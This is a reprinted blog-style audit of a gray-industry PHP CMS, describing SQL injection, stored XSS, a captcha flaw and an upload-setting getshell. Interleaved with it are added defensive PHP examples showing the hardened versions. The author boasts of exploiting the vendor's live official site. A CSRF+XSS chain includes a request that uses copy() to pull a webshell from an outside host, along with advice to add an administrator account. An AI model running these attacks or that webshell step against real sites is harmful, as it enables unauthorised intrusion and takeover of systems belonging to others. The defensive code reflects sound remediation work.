
Title: Record of a code audit of a gray-industry CMS


1. Directory structure

First, let's take a look at the structure. The relevant code lives in the system folder. I'll go straight to the vulnerabilities.

[image]

2. Audit findings

1. Shopping cart fetches information asynchronously: SQL injection

system\modules\member\cart.action.php

[image]

Although the global filter escapes single quotes, the parameter here is not wrapped in quotes, so it is injectable, and the user's identity is not checked: the injection works without logging in, from outside the site.

[image]

[image]

Straight onto the official site, hahaha!
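As an added example (not code from the audited CMS), the following PHP shows why a quote-escaping filter gives no protection when the cart id is interpolated into SQL without quotes, and how the lookup would be hardened: refuse anonymous callers, accept only a plain integer, and bind the value with a prepared statement scoped to the member's own rows. The table and column names (cart, id, member_id, item) and the filter function are assumptions; the demo runs against an in-memory SQLite database with constructed rows.

```php
<?php
// Added example, not code from the audited CMS. Table and column names are assumptions.

// Stand-in for a CMS-wide "filter single quotes" input filter (assumption).
function cms_style_filter(string $value): string
{
    return addslashes($value);
}

// Vulnerable pattern: the id sits in a numeric context with no quotes, so the
// quote-escaping filter has nothing to escape and the input reaches SQL as-is.
function build_cart_query_vulnerable(string $id): string
{
    $id = cms_style_filter($id);
    return "SELECT * FROM cart WHERE id = $id";
}

// Hardened: caller must be authenticated, the id must be a plain integer, and the
// value is bound through a prepared statement, scoped to the member's own rows.
function cart_lookup_hardened(PDO $pdo, ?int $member_id, string $id): ?array
{
    if ($member_id === null) {                   // no session: refuse before touching the database
        return null;
    }
    if (!ctype_digit($id) || strlen($id) > 18) { // only a plain decimal integer is acceptable
        return null;
    }
    $stmt = $pdo->prepare("SELECT id, member_id, item FROM cart WHERE id = :id AND member_id = :member");
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->bindValue(':member', $member_id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Demo against an in-memory SQLite database with constructed sample rows.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE cart (id INTEGER PRIMARY KEY, member_id INTEGER, item TEXT)");
$pdo->exec("INSERT INTO cart VALUES (1, 10, 'widget'), (2, 11, 'gadget')");

$untrusted = "1 OR 1=1";                               // contains no quote, so the filter leaves it intact
echo build_cart_query_vulnerable($untrusted), PHP_EOL;  // the WHERE clause is no longer a single-row lookup
var_dump(cart_lookup_hardened($pdo, null, "1"));        // NULL: anonymous caller refused
var_dump(cart_lookup_hardened($pdo, 10, $untrusted));   // NULL: rejected by the integer check
var_dump(cart_lookup_hardened($pdo, 11, "2"));          // the gadget row, owned by member 11
var_dump(cart_lookup_hardened($pdo, 10, "2"));          // NULL: member 10 does not own row 2
```

The point of the `ctype_digit` check is that escaping is context-dependent: `addslashes` only helps inside a quoted string literal, while a bare numeric placeholder needs type enforcement or, better, a bound parameter that the driver never treats as SQL.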

2. BOM plugin: directory access

system/plugin/bom/bom.plugin.php

[image]

Just access it directly. Even if the admin backend path has been changed, it doesn't matter; it still works!

[image]

3. My orders: stored XSS (can grab administrator cookies)

Since this CMS came out quite a while ago, plenty of people have found XSS in it before, but my XSS seems to be a 0day, hahaha. It requires the post-order function. Here I'll walk through the process first.

[image]

Add a picture

[image]

Change the image address to our XSS payload

[image]

The fileurl_tmp parameter

[image]

At this point the IMG tag is closed and a 1 pops up (triggered by the "Show order view" page in the admin backend)

[image]
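As an added example (not the CMS's own code), this PHP shows the two-sided fix for the stored XSS in the order image field: validate the submitted value as an http(s) URL before storing it, and attribute-escape it when the admin order view renders it, so a value crafted to close the `<img>` tag is either refused or rendered as inert text. The function names and the handling of the fileurl_tmp field are assumptions, and the inputs are constructed.

```php
<?php
// Added example, not the CMS's code. Function names and field handling are assumptions.

// Input side: only absolute http(s) URLs are accepted for storage.
function sanitize_image_url(string $url): ?string
{
    $url = trim($url);
    if ($url === '' || strlen($url) > 2048) {
        return null;
    }
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return null;                         // relative or malformed input is refused
    }
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return null;                         // blocks javascript:, data: and similar schemes
    }
    return $url;
}

// Output side: never trust the stored value; always escape it for the attribute context.
function render_order_image(string $stored): string
{
    $safe = sanitize_image_url($stored);
    if ($safe === null) {
        return '<span>(invalid image)</span>';
    }
    return '<img src="' . htmlspecialchars($safe, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '" alt="order image">';
}

// Constructed inputs: a normal URL, a value that tries to break out of the attribute,
// and a URL that is well-formed but carries a closing quote and a new attribute inside it.
$inputs = [
    'https://cdn.example.com/orders/123.jpg',
    '"><script>alert(1)</script>',
    'http://evil.example/x.jpg" onerror="alert(1)',
];
foreach ($inputs as $in) {
    echo render_order_image($in), PHP_EOL;
}
// The second case is refused (no scheme or host). The third is either refused by parse_url
// or rendered with &quot; in place of each quote, so the src attribute never closes early.
```

Escaping on output is what actually prevents the tag from being closed; the input validation is a second layer that also keeps non-http schemes out of the stored data.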

4. Upload configuration: backend getshell

Some people may notice there are upload functions in the backend, but in fact those uploads can't be used. Although you can change the whitelist of allowed formats in the backend, you still can't get a shell from them. That's where this comes in!~~

[image]

Since single quotes are filtered, no single quotes are used here.

[image]

Write the payload into the allowed upload types field

[image]

Done after submitting~~ Then write a webshell remotely via the copy function

[image]

5. The backend captcha is flawed

[image]

For the default account admin, this string of MD5 values is the corresponding captcha value, and the interface can be called here for brute-forcing. It's a small flaw too.

6. Combo getshell: CSRF + XSS

We use the XSS to embed an HTML page directly and then simulate all the operations. Done. Start by modifying the upload format and inserting the shell, then simulate the access:

/index.php/admin/setting/upload?c=copy('http://www.xxx.com/shell.txt','./inc.php');

Just hit a few columns and it's done. If you're really not at ease, add an administrator at the end.

This CMS doesn't guard against CSRF at all, and I won't take screenshots; the big brothers' techniques are fancier than mine. Wow, hahaha
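As an added example covering findings 4 and 6 (not the CMS's own code), this PHP shows two server-side mitigations: the admin-editable upload whitelist can never override a fixed deny list of executable extensions, and the settings endpoint refuses any state change that does not carry a CSRF token tied to the session. The setting name `upload_types`, the `|`-separated list format, the function names and the session layout are assumptions; all inputs are constructed.

```php
<?php
// Added example, not the audited CMS's code. Names and list format are assumptions.

// Extensions the server must never store, whatever the admin whitelist says.
const EXECUTABLE_EXTENSIONS = ['php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'phar', 'htaccess'];

// Normalise the configured whitelist and strip anything that could execute on the server.
function effective_upload_whitelist(string $configured): array
{
    $allowed = [];
    foreach (explode('|', strtolower($configured)) as $ext) {
        $ext = trim($ext, " .");
        if ($ext === '' || in_array($ext, EXECUTABLE_EXTENSIONS, true)) {
            continue;                                  // silently dropped, never persisted
        }
        $allowed[] = $ext;
    }
    return array_values(array_unique($allowed));
}

// Decide whether a filename may be stored: only the final extension counts and it
// must be on the effective whitelist. The web server must still be configured not
// to execute by an inner extension (e.g. name.php.jpg) for this to be sufficient.
function upload_permitted(string $filename, string $configured): bool
{
    $base = basename($filename);
    if (strpos($base, "\0") !== false) {
        return false;                                  // null byte would truncate the name downstream
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    if ($ext === '' || in_array($ext, EXECUTABLE_EXTENSIONS, true)) {
        return false;
    }
    return in_array($ext, effective_upload_whitelist($configured), true);
}

// CSRF: one random token per session, compared in constant time.
function csrf_token(array &$session): string
{
    if (empty($session['csrf'])) {
        $session['csrf'] = bin2hex(random_bytes(32));
    }
    return $session['csrf'];
}

function csrf_valid(array $session, ?string $submitted): bool
{
    return is_string($submitted) && !empty($session['csrf']) && hash_equals($session['csrf'], $submitted);
}

// Settings handler: reject the request before touching configuration if the token is missing or wrong.
function handle_setting_change(array $session, array $post): string
{
    if (!csrf_valid($session, $post['csrf'] ?? null)) {
        return 'rejected: missing or bad CSRF token';
    }
    $list = effective_upload_whitelist($post['upload_types'] ?? '');
    return 'saved: ' . implode('|', $list);
}

// Demo with constructed session and form data.
$session = [];
$token = csrf_token($session);
echo handle_setting_change($session, ['upload_types' => 'jpg|png|php|gif']), PHP_EOL;                  // rejected (forged cross-site request carries no token)
echo handle_setting_change($session, ['upload_types' => 'jpg|png|php|gif', 'csrf' => $token]), PHP_EOL; // saved: jpg|png|gif
var_dump(upload_permitted('inc.php', 'jpg|png|php'));     // bool(false): php is stripped even if configured
var_dump(upload_permitted('photo.jpg', 'jpg|png|php'));   // bool(true)
var_dump(upload_permitted('photo.JPG.phtml', 'jpg|png')); // bool(false): final extension is executable
```

The token check has to come first: the attack chain in this post works because the settings endpoint accepts any request that arrives with the admin's cookies, and the XSS only supplies a way to send that request from the admin's browser. Treating the allowed-types setting as data rather than as code to be written into a PHP file would close the `copy()` path as well.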

Reprinted from the original link: https://mp.weixin.qq.com/s/8OTU9yQ3pxj6k2QpbEzNRA
